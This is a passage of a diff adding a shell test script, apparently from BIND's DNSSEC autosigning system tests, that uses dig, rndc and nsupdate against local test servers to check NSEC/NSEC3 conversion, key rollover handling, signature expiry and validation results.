done + i=$((i + 1)) + if [ $ret = 0 ]; then break; fi + echo_i "waiting ... ($i)" + sleep 2 +done +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "done"; fi +status=$((status + ret)) + +echo_i "Convert optout-with-ent from nsec to nsec3" +($RNDCCMD 10.53.0.2 signing -nsec3param 1 1 1 - optout-with-ent 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1 + +echo_i "Initial counts of RRSIG expiry fields values for auto signed zones" +for z in . +do + echo_i zone $z + $DIG $DIGOPTS $z @10.53.0.1 axfr | awk '$4 == "RRSIG" {print $9}' | sort | uniq -c | cat_i +done +for z in bar. example. private.secure.example. +do + echo_i zone $z + $DIG $DIGOPTS $z @10.53.0.2 axfr | awk '$4 == "RRSIG" {print $9}' | sort | uniq -c | cat_i +done +for z in inacksk2.example. inacksk3.example inaczsk2.example. inaczsk3.example +do + echo_i zone $z + $DIG $DIGOPTS $z @10.53.0.3 axfr | awk '$4 == "RRSIG" {print $9}' | sort | uniq -c | cat_i +done + +# Set logfile offset for wait_for_log usage. 
+nextpartreset ns3/named.run + +# +# Check that DNSKEY is initially signed with a KSK and not a ZSK. +# +echo_i "check that zone with active and inactive KSK and active ZSK is properly" +echo_ic "resigned after the active KSK is deleted - stage 1: Verify that DNSKEY" +echo_ic "is initially signed with a KSK and not a ZSK. ($n)" +ret=0 + +$DIG $DIGOPTS @10.53.0.3 axfr inacksk3.example > dig.out.ns3.test$n + +zskid=$(awk '$4 == "DNSKEY" && $5 == 256 { print }' dig.out.ns3.test$n | + $DSFROMKEY -A -2 -f - inacksk3.example | awk '{ print $4}') +grep "DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 " dig.out.ns3.test$n > /dev/null || ret=1 + +pattern="DNSKEY ${DEFAULT_ALGORITHM_NUMBER} 2 [0-9]* [0-9]* [0-9]* ${zskid} " +grep "${pattern}" dig.out.ns3.test$n > /dev/null && ret=1 + +count=$(awk 'BEGIN { count = 0 } + $4 == "RRSIG" && $5 == "DNSKEY" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 1 || ret=1 + +count=$(awk 'BEGIN { count = 0 } + $4 == "DNSKEY" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 3 || ret=1 + +awk='$4 == "RRSIG" && $5 == "DNSKEY" { printf "%05u\n", $11 }' +id=$(awk "${awk}" dig.out.ns3.test$n) + +keyfile=$(printf "ns3/Kinacksk3.example.+%03u+%s" "${DEFAULT_ALGORITHM_NUMBER}" "${id}") +$SETTIME -D now+5 "${keyfile}" > settime.out.test$n || ret=1 +($RNDCCMD 10.53.0.3 loadkeys inacksk3.example 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 + +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# +# Check that zone is initially signed with a ZSK and not a KSK. +# +echo_i "check that zone with active and inactive ZSK and active KSK is properly" +echo_ic "resigned after the active ZSK is deleted - stage 1: Verify that zone" +echo_ic "is initially signed with a ZSK and not a KSK. 
($n)" +ret=0 +$DIG $DIGOPTS @10.53.0.3 axfr inaczsk3.example > dig.out.ns3.test$n +kskid=$(awk '$4 == "DNSKEY" && $5 == 257 { print }' dig.out.ns3.test$n | + $DSFROMKEY -2 -f - inaczsk3.example | awk '{ print $4}' ) +grep "CNAME ${DEFAULT_ALGORITHM_NUMBER} 3 " dig.out.ns3.test$n > /dev/null || ret=1 +grep "CNAME ${DEFAULT_ALGORITHM_NUMBER} 3 [0-9]* [0-9]* [0-9]* ${kskid} " dig.out.ns3.test$n > /dev/null && ret=1 +count=$(awk 'BEGIN { count = 0 } + $4 == "RRSIG" && $5 == "CNAME" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 1 || ret=1 +count=$(awk 'BEGIN { count = 0 } + $4 == "DNSKEY" { count++ } + END {print count}' dig.out.ns3.test$n) +test $count -eq 3 || ret=1 +id=$(awk '$4 == "RRSIG" && $5 == "CNAME" { printf "%05u\n", $11 }' dig.out.ns3.test$n) + +keyfile=$(printf "ns3/Kinaczsk3.example.+%03u+%s" "${DEFAULT_ALGORITHM_NUMBER}" "${id}") +$SETTIME -D now+5 "${keyfile}" > settime.out.test$n || ret=1 +($RNDCCMD 10.53.0.3 loadkeys inaczsk3.example 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC->NSEC3 conversion prerequisites ($n)" +ret=0 +# these commands should result in an empty file: +$DIG $DIGOPTS +noall +answer nsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.1.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noall +answer autonsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.2.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.2.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC3->NSEC conversion prerequisites ($n)" +ret=0 +$DIG $DIGOPTS +noall +answer nsec3-to-nsec.example. 
nsec3param @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "converting zones from nsec to nsec3" +$NSUPDATE > /dev/null 2>&1 <<END || status=1 +server 10.53.0.3 ${PORT} +zone nsec3.nsec3.example. +update add nsec3.nsec3.example. 3600 NSEC3PARAM 1 0 10 BEEF +send +zone optout.nsec3.example. +update add optout.nsec3.example. 3600 NSEC3PARAM 1 1 10 BEEF +send +zone nsec3.example. +update add nsec3.example. 3600 NSEC3PARAM 1 0 10 BEEF +send +zone autonsec3.example. +update add autonsec3.example. 3600 NSEC3PARAM 1 0 20 DEAF +send +zone nsec3.optout.example. +update add nsec3.optout.example. 3600 NSEC3PARAM 1 0 10 BEEF +send +zone optout.optout.example. +update add optout.optout.example. 3600 NSEC3PARAM 1 1 10 BEEF +send +zone optout.example. +update add optout.example. 3600 NSEC3PARAM 1 1 10 BEEF +send +END + +if $SHELL ../testcrypto.sh -q RSASHA1 +then + # try to convert nsec-only.example; this should fail due to + # non-NSEC3 compatible keys + echo_i "preset nsec3param in unsigned zone via nsupdate ($n)" + $NSUPDATE > nsupdate.out 2>&1 <<END +server 10.53.0.3 ${PORT} +zone nsec-only.example. +update add nsec-only.example. 3600 NSEC3PARAM 1 0 10 BEEF +send +END +fi + +echo_i "checking for nsec3param in unsigned zone ($n)" +ret=0 +$DIG $DIGOPTS +noall +answer autonsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking for nsec3param signing record ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -list autonsec3.example. 
> signing.out.test$n 2>&1 +grep "Pending NSEC3 chain 1 0 20 DEAF" signing.out.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "resetting nsec3param via rndc signing ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -clear all autonsec3.example. > /dev/null 2>&1 +$RNDCCMD 10.53.0.3 signing -nsec3param 1 1 10 beef autonsec3.example. > /dev/null 2>&1 +for i in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + $RNDCCMD 10.53.0.3 signing -list autonsec3.example. > signing.out.test$n 2>&1 + grep "Pending NSEC3 chain 1 1 10 BEEF" signing.out.test$n > /dev/null || ret=1 + num=$(grep "Pending " signing.out.test$n | wc -l) + [ $num -eq 1 ] || ret=1 + [ $ret -eq 0 ] && break + echo_i "waiting ... ($i)" + sleep 2 +done +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "signing preset nsec3 zone" +zsk=$(cat autozsk.key) +ksk=$(cat autoksk.key) +$SETTIME -K ns3 -P now -A now $zsk > settime.out.test$n.zsk || ret=1 +$SETTIME -K ns3 -P now -A now $ksk > settime.out.test$n.ksk || ret=1 +($RNDCCMD 10.53.0.3 loadkeys autonsec3.example. 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 + +echo_i "waiting for changes to take effect" +sleep 3 + +echo_i "converting zone from nsec3 to nsec" +$NSUPDATE > /dev/null 2>&1 << END || status=1 +server 10.53.0.3 ${PORT} +zone nsec3-to-nsec.example. +update delete nsec3-to-nsec.example. 
NSEC3PARAM +send +END + +echo_i "waiting for change to take effect" +sleep 3 + +missing=$(keyfile_to_key_id "$(cat noksk-ksk.key)") +echo_i "checking that expired RRSIGs from missing KSK $missing are not deleted ($n)" +ret=0 +$JOURNALPRINT ns3/noksk.example.db.jnl | \ + awk '{if ($1 == "del" && $5 == "RRSIG" && $12 == id) {error=1}} END {exit error}' id=$missing || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +missing=$(keyfile_to_key_id "$(cat nozsk-zsk.key)") +ksk=$(keyfile_to_key_id "$(cat nozsk-ksk.key)") +echo_i "checking that expired RRSIGs from missing ZSK $missing are replaced ($n)" +ret=0 +$JOURNALPRINT ns3/nozsk.example.db.jnl | \ + awk '{if ($1 == "del" && $5 == "RRSIG" && $12 == id) {ok=1}} END {exit ok?0:1}' id=$missing || ret=1 +$JOURNALPRINT ns3/nozsk.example.db.jnl | \ + awk '{if ($1 == "add" && $5 == "RRSIG" && $12 == id) {ok=1}} END {exit ok?0:1}' id=$ksk || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +inactive=$(keyfile_to_key_id "$(cat inaczsk-zsk.key)") +ksk=$(keyfile_to_key_id "$(cat inaczsk-ksk.key)") +echo_i "checking that expired RRSIGs from inactive ZSK $inactive are replaced ($n)" +ret=0 +$JOURNALPRINT ns3/inaczsk.example.db.jnl | \ + awk '{if ($1 == "del" && $5 == "RRSIG" && $12 == id) {ok=1}} END {exit ok?0:1}' id=$inactive || ret=1 +$JOURNALPRINT ns3/inaczsk.example.db.jnl | \ + awk '{if ($1 == "add" && $5 == "RRSIG" && $12 == id) {ok=1}} END {exit ok?0:1}' id=$ksk || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that replaced RRSIGs are not logged (missing ZSK private key) ($n)" +ret=0 +loglines=$(grep "Key nozsk.example/$DEFAULT_ALGORITHM/$missing .* retaining signatures" ns3/named.run | wc -l) +[ "$loglines" -eq 0 ] || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking that replaced RRSIGs are not logged (inactive ZSK 
private key) ($n)" +ret=0 +loglines=$(grep "Key inaczsk.example/$DEFAULT_ALGORITHM/$inactive .* retaining signatures" ns3/named.run | wc -l) +[ "$loglines" -eq 0 ] || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Send rndc sync command to ns1, ns2 and ns3, to force the dynamically +# signed zones to be dumped to their zone files +echo_i "dumping zone files" +($RNDCCMD 10.53.0.1 sync 2>&1 | sed 's/^/ns1 /' | cat_i) || ret=1 +($RNDCCMD 10.53.0.2 sync 2>&1 | sed 's/^/ns2 /' | cat_i) || ret=1 +($RNDCCMD 10.53.0.3 sync 2>&1 | sed 's/^/ns3 /' | cat_i) || ret=1 + +now="$(TZ=UTC date +%Y%m%d%H%M%S)" +check_expiry() ( + $DIG $DIGOPTS AXFR oldsigs.example @10.53.0.3 > dig.out.test$n + nearest_expiration="$(awk '$4 == "RRSIG" { print $9 }' < dig.out.test$n | sort -n | head -1)" + if [ "$nearest_expiration" -le "$now" ]; then + echo_i "failed: $nearest_expiration <= $now" + return 1 + fi +) + +echo_i "checking expired signatures were updated ($n)" +retry 10 check_expiry || ret=1 +$DIG $DIGOPTS +noauth a.oldsigs.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.oldsigs.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check jitter distribution. +echo_i "checking expired signatures were jittered correctly ($n)" +ret=0 +$DIG $DIGOPTS axfr oldsigs.example @10.53.0.3 > dig.out.ns3.test$n || ret=1 +checkjitter dig.out.ns3.test$n || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC->NSEC3 conversion succeeded ($n)" +ret=0 +$DIG $DIGOPTS nsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.ok.test$n || ret=1 +grep "status: NOERROR" dig.out.ns3.ok.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noauth q.nsec3.example. 
@10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.nsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking direct NSEC3 autosigning succeeded ($n)" +ret=0 +$DIG $DIGOPTS +noall +answer autonsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.ok.test$n || ret=1 +[ -s dig.out.ns3.ok.test$n ] || ret=1 +grep "NSEC3PARAM" dig.out.ns3.ok.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noauth q.autonsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.autonsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC->NSEC3 conversion failed with NSEC-only key ($n)" +ret=0 +if $SHELL ../testcrypto.sh -q RSASHA1 +then + grep "failed: REFUSED" nsupdate.out > /dev/null || ret=1 +else + echo_i "skip: RSASHA1 not supported" +fi +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC3->NSEC conversion succeeded ($n)" +ret=0 +# this command should result in an empty file: +$DIG $DIGOPTS +noall +answer nsec3-to-nsec.example. nsec3param @10.53.0.3 > dig.out.ns3.nx.test$n || ret=1 +grep "NSEC3PARAM" dig.out.ns3.nx.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noauth q.nsec3-to-nsec.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.nsec3-to-nsec.example. 
@10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking NSEC3->NSEC conversion with 'rndc signing -nsec3param none' ($n)" +ret=0 +$RNDCCMD 10.53.0.3 signing -nsec3param none autonsec3.example. > /dev/null 2>&1 +# this command should result in an empty file: +no_nsec3param() ( + $DIG $DIGOPTS +noall +answer autonsec3.example. nsec3param @10.53.0.3 > dig.out.ns3.nx.test$n || return 1 + grep "NSEC3PARAM" dig.out.ns3.nx.test$n > /dev/null && return 1 + return 0 +) +retry_quiet 10 no_nsec3param || ret=1 +$DIG $DIGOPTS +noauth q.autonsec3.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.autonsec3.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking TTLs of imported DNSKEYs (no default) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noall +answer dnskey ttl1.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1 +[ -s dig.out.ns3.test$n ] || ret=1 +(awk 'BEGIN {r=0} $2 != 300 {r=1; print "found TTL " $2} END {exit r}' dig.out.ns3.test$n | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking TTLs of imported DNSKEYs (with default) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noall +answer dnskey ttl2.example. 
@10.53.0.3 > dig.out.ns3.test$n || ret=1 +[ -s dig.out.ns3.test$n ] || ret=1 +(awk 'BEGIN {r=0} $2 != 60 {r=1; print "found TTL " $2} END {exit r}' dig.out.ns3.test$n | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking TTLs of imported DNSKEYs (mismatched) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noall +answer dnskey ttl3.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1 +[ -s dig.out.ns3.test$n ] || ret=1 +(awk 'BEGIN {r=0} $2 != 30 {r=1; print "found TTL " $2} END {exit r}' dig.out.ns3.test$n | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking TTLs of imported DNSKEYs (existing RRset) ($n)" +ret=0 +$DIG $DIGOPTS +tcp +noall +answer dnskey ttl4.example. @10.53.0.3 > dig.out.ns3.test$n || ret=1 +[ -s dig.out.ns3.test$n ] || ret=1 +(awk 'BEGIN {r=0} $2 != 30 {r=1; print "found TTL " $2} END {exit r}' dig.out.ns3.test$n | cat_i) || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking positive validation NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +$DIG $DIGOPTS +noauth a.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking positive validation NSEC3 ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.nsec3.example. 
\ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking positive validation OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.optout.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NXDOMAIN NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth q.example. @10.53.0.2 a > dig.out.ns2.test$n || ret=1 +$DIG $DIGOPTS +noauth q.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NXDOMAIN NSEC3 ($n)" +ret=0 +$DIG $DIGOPTS +noauth q.nsec3.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.nsec3.example. \ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NXDOMAIN OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth q.optout.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth q.optout.example. 
\ + @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NODATA NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.example. @10.53.0.2 txt > dig.out.ns2.test$n || ret=1 +$DIG $DIGOPTS +noauth a.example. @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns2.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NODATA NSEC3 ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.nsec3.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.nsec3.example. \ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking negative validation NODATA OPTOUT ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.optout.example. \ + @10.53.0.3 txt > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.optout.example. 
\ + @10.53.0.4 txt > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +grep "ANSWER: 0" dig.out.ns4.test$n > /dev/null || ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check the insecure.example domain + +echo_i "checking 1-server insecurity proof NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.insecure.example. @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.insecure.example. @10.53.0.4 a > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +echo_i "checking 1-server negative insecurity proof NSEC ($n)" +ret=0 +$DIG $DIGOPTS q.insecure.example. a @10.53.0.3 \ + > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS q.insecure.example. a @10.53.0.4 \ + > dig.out.ns4.test$n || ret=1 +digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1 +grep "status: NXDOMAIN" dig.out.ns4.test$n > /dev/null || ret=1 +# Note - this is looking for failure, hence the && +grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null && ret=1 +n=$((n + 1)) +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status + ret)) + +# Check the secure.example domain + +echo_i "checking multi-stage positive validation NSEC/NSEC ($n)" +ret=0 +$DIG $DIGOPTS +noauth a.secure.example. \ + @10.53.0.3 a > dig.out.ns3.test$n || ret=1 +$DIG $DIGOPTS +noauth a.secure.example. 
\
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking multi-stage positive validation NSEC/NSEC3 ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.nsec3.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.nsec3.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking multi-stage positive validation NSEC/OPTOUT ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.optout.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.optout.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking multi-stage positive validation NSEC3/NSEC ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.secure.nsec3.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.secure.nsec3.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking multi-stage positive validation NSEC3/NSEC3 ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.nsec3.nsec3.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.nsec3.nsec3.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking multi-stage positive validation NSEC3/OPTOUT ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.optout.nsec3.example. \
+ @10.53.0.3 a > dig.out.ns3.test$n || ret=1
+$DIG $DIGOPTS +noauth a.optout.nsec3.example. \
+ @10.53.0.4 a > dig.out.ns4.test$n || ret=1
+digcomp dig.out.ns3.test$n dig.out.ns4.test$n || ret=1
+grep "status: NOERROR" dig.out.ns4.test$n > /dev/null || ret=1
+grep "flags:.*ad.*QUERY" dig.out.ns4.test$n > /dev/null || ret=1
+n=$((n + 1))
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status + ret))
+
+echo_i "checking multi-stage positive validation OPTOUT/NSEC ($n)"
+ret=0
+$DIG $DIGOPTS +noauth a.secure.optout.example. \
